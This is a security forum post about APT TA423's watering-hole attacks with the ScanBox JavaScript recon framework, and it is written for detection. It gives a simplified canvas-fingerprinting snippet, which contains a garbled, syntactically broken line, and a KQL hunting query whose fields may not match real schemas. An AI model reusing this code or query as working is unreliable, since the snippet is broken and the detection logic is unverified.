TA423 Strikes Again: ScanBox Recon in Watering Hole Attacks

Just caught the Threatpost report on APT TA423 utilizing watering holes to deploy the ScanBox reconnaissance framework. While the headline mentions a keylogger, ScanBox is more concerning for its initial profiling capabilities. It's purely JavaScript-based, which makes it a nightmare for traditional EDR solutions that focus on file-system artifacts.

The attackers are likely compromising legitimate vertical-specific sites to infect targets. Once a victim visits, the JS payload executes immediately to gather system fingerprints without any second-stage payload initially.

Here is a simplified example of the type of browser profiling logic often seen in these campaigns:

function getFingerprint() {
    var canvas = document.createElement('canvas');
    var ctx = canvas.getContext('2d');
    var txt = 'ScanBox Recon';
    ctx.textBaseline = "top";
    ctx.fArial'";
    ctx.fillStyle = "#f60";
    ctx.fillText(txt, 2, 15);
    return canvas.toDataURL();
}

For detection, since the malicious code runs in the browser, we need to lean heavily on network telemetry and proxy logs. I've been tuning our SIEM to look for long-duration connections or unusual data POSTs to endpoints that don't match the site's legitimate traffic patterns.

Basic hunting query (KQL):

DeviceNetworkEvents
| where RemoteUrl contains ".js"
| where InitiatingProcessFileName in~ ("chrome.exe", "msedge.exe", "firefox.exe")
| where NetworkBytes > 100000 // Threshold for large JS blobs
| project Timestamp, DeviceName, RemoteUrl, NetworkBytes

Has anyone else seen similar profiling activity in their logs recently? How are you handling browser-based threats without crippling productivity with strict isolation?